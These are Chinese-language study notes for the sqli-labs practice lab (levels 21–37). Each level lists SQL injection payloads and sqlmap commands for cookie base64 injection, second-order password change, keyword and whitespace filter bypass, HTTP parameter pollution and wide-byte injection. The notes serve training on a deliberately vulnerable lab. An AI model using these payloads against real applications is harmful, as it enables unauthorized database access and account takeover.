sqli-labs(advanced)
(base64编码——注意 base64 只是编码而非加密, 不提供任何保密性; Less-21/22 会先对 Cookie 值做 base64 解码再拼入 SQL, 所以 payload 需 base64 编码后放入 Cookie)
Less-21:
select * from table where cookie=('cookie');
admin') and sleep(5)#>>YWRtaW4nKSBhbmQgc2xlZXAoNSkj
sqlmap --cookie="<cookie>" --level 2 --tamper=base64encode  (注入点在 Cookie 中, sqlmap 需 --level>=2 才会测试 Cookie 头, 可再用 -p 指定参数名)
Less-22:
select * from table where cookie="cookie";
admin" and sleep(5)#>>YWRtaW4iIGFuZCBzbGVlcCg1KSM=
(# 与 -- 注释符被过滤: 无法用注释截断尾部, 改为用引号闭合后半句, 如下例 1' and 1='1 让语句原有的尾部引号自然闭合)
Less-23:
select * from table where id='1';
1' and 1='1
(更改用户密码——二次注入/存储型注入: 注册时输入虽经转义, 但改密时直接拼接的是数据库中已存储、未再转义的用户名)
Less-24:
update table set password='test' where username='admin' and password='admin';
注册用户 admin'#  (库中存入的用户名即为 admin'#)
以 admin'# 登录并修改密码, 按上面模板拼出的语句变为 update table set password='新密码' where username='admin'#' and password='...'; # 之后被注释掉, 实际被改掉的是 admin 的密码
(and,or过滤)
Less-25:
select * from table where id='1';
大小写变换 (仅在过滤区分大小写时有效; 若过滤用的是不区分大小写的正则, 如 preg_replace 带 /i 修饰符, 则无效, 此时优先双写)
双写: aandnd -> and, oorr -> or; 注意 or 过滤同样会破坏 information_schema、password、order 等含 "or" 的词, 这些也要双写 (infoorrmation_schema, passwoorrd)
hex 编码 (只能用于 SQL 中的字符串值, 如 0x61646d696e 代替 'admin', 不能替代被过滤的关键字); urlencode 通常无效, 因为服务端一般在过滤之前就已完成 URL 解码
添加注释
&& 与 || 代替 and / or (放在 URL 中需编码为 %26%26 和 %7C%7C, 否则 & 会被当成参数分隔符)
sqlmap --hex (只影响取回数据时的 hex 转换, 并不能绕过关键字过滤; and/or 被过滤时用 --tamper=symboliclogical 将其替换为 && / ||)
Less-25a:
select * from table where id=1;
(空格,注释过滤)
Less-26:
select * from table where id='1';
%09 水平制表符(TAB), %0b 垂直制表符
%0a 新建一行
%0c 新建一页
%0d return
%a0 不间断空格 (是否可用取决于后端 PHP/MySQL 版本与操作系统平台, 需实测)
1'||'1构造闭合
Less-26a:
select * from table where id=('1');
and(sleep(5))||('1
Less-27:
select * from table where id='1';
Less-27a:
select * from table where id="1";
Less-28:
select * from table where id=('1');
Less-28a:
select * from table where id=('1');
如果没有回显, 换用不同的空白字符/编码多试几次 (不同平台对 %0a、%a0 等字符的处理不一致)
sqlmap --tamper=randomcase,space2randomblank  (多个 tamper 用逗号分隔, 脚本名可省略 .py; 按需叠加 space2comment 等)
(WAF)
Less-29:
select * from table where id='1';
?id=1&id=2' and 1=1%23  (HTTP 参数污染 HPP: 利用前端 WAF/中间件与后端 PHP 对重复参数取值不一致——前者检查第一个 id=1 放行, 后者取最后一个 id 执行)
Less-30:
select * from table where id="1";
sqlmap --hpp (启用参数污染); 注意 --skip-waf 只是跳过 WAF/IPS 的检测启发式, 并不能绕过 WAF, 绕过要靠 tamper 脚本或 --hpp
Less-31:
select * from table where id=("1");
(宽字节注入: addslashes 之类的转义把 ' 变成 \' 即 %5c%27, 在 GBK 连接字符集下 %df%5c 被当作一个双字节汉字, 反斜杠被"吃掉", 引号得以逃逸; 根本修复是正确设置连接字符集并改用参数化查询)
Less-32:
select * from table where id='1';
%df' and 1=1%23
sqlmap --tamper=unmagicquotes  (以 %bf%27 的宽字节组合替换引号; 通常配合 --dbms=mysql 使用)
Less-33:
select * from table where id='1';
Less-34:
select * from table where username='admin' and password='admin';
Less-35:
select * from table where id=1;
and 1=1%23  (数值型注入点无需引号, 因此 addslashes 等针对引号的转义对它无效)
Less-36:
select * from table where id='1';
Less-37:
select * from table where username='admin' and password='admin';